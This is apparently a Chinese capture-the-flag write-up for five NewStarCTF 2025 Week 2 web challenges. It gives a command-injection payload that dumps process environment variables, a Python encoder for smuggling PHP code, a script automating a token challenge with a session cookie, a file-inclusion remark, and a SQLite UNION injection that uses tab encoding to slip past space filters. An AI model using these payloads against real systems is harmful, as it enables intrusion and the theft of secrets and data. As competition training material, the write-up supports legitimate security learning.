NewStarCTF2025-Week2-Web

目录

1、DD加速器

2、真的是签到诶

3、搞点哦润吉吃吃橘

4、白帽小K的故事（1）

5、小E的管理系统

1、DD加速器

在环境变量里

Payload：;cat /proc/self/environ

2、真的是签到诶

需要对payload进行一些加密处理和替换

cyberchef 可以直接处理

这里用 python 实现

Exp：

#!/usr/bin/env python3 import base64, codecs, sys def atbash(text: str) -> str:     result = []     for ch in text:         if 'A' <= ch <= 'Z':             base = ord('A')             offset = ord(ch) - base             new = chr(base + (25 - offset))             result.append(new)         elif 'a' <= ch <= 'z':             base = ord('a')             offset = ord(ch) - base             new = chr(base + (25 - offset))             result.append(new)         else:             result.append(ch)     return ''.join(result) def make_cipher(php_code: str) -> str:     rot = codecs.encode(php_code, 'rot_13')     atb = atbash(rot)     return base64.b64encode(atb.encode()).decode() if __name__ == '__main__':     if len(sys.argv) > 1:        .join(sys.argv[1:])     else:         php_code = input('Enter PHP code to run (example: echo "签到成功";): ')     cipher = make_cipher(php_code)     print('cipher=' + cipher)     print('\nExample curl command:')     print("curl -X POST -d 'cipher={}' http://target/".format(cipher))

Payload：

cipher=dW91dGlhKCd0bWske0VIVX0vaConKTs=

3、搞点哦润吉吃吃橘

注释里给了用户名和密码

通过抓包拿到请求和验证的接口

写脚本处理：

注意到session每次都是动态刷新的，来自于访问/home时的session

Exp：

import requests import re import warnings import time warnings.filterwarnings("ignore", message="Unverified HTTPS request") BASE_URL = "https://eci-2zeiq1qx3sfyu0wmkq2l.cloudeci1.ichunqiu.com:5000" HEADERS = {     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",     "Referer": BASE_URL + "/", } COOKIES = {     "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1758870051,1759023301,1759045200,1759196465",     "session": ".eJxNy0EKwyAQQNG7zNpFoikTXfceIu1ghFHDZIRC6N3b7LL-_53w2hIztUyxDtaycyGB4NEuaG7x0CQatVSCMOPDo5ucm-_Hp_8dLpNfrTPAPWd6x9IgqAwyMA6Sli4Ozy4dvj8rJSkm.aONamw.-1Fr7-rum_bnGpnzrcLjL6Z1mqc" } def fast_challenge():     with requests.Session() as s:         # 1. 获取 challenge JSON         r = s.post(BASE_URL + "/start_challenge", headers=HEADERS, cookies=COOKIES, verify=False)         r.raise_for_status()         data = r.json()  # 直接解析 JSON         expr = data["expression"]         # 2. 提取数字         match = re.search(r'\((\d+)\s*\*\s*(\d+)\)\s*\^\s*0x([0-9a-fA-F]+)', expr)         if not match:             raise ValueError("无法解析 expression")         a, b, c = match.groups()         token_value = (int(a) * int(b)) ^ int(c, 16)         # 3. 立即提交 token         r2 = s.post(BASE_URL + "/verify_token", json={"token": token_value}, headers=HEADERS, cookies=COOKIES,                     verify=False)         print(r2.status_code, r2.text) if __name__ == "__main__":     fast_challenge()

4、白帽小K的故事（1）

先是在源码里看到一些接口信息

就一个前端绕过

调用

甚至都不用绕过，是文件包含漏洞，直接传 mp3 后缀也可以

5、小E的管理系统

测了好久终于有反应了，空格可以使用%09代替

不要在界面测，发到bp去自己编码

字段数是5

随便测了一下发现应该不是mysql

是 sqlite

用select * 可以查

当然也可以用join拼接一下

查数据，最终payload：

?id=0%09union%09select%09*%09from%09(select%091)a%09join%09(select%092)b%09join%09(select%093)c%09join%09(select%094)d%09join%09(select%09config_value%09from%09sys_config)e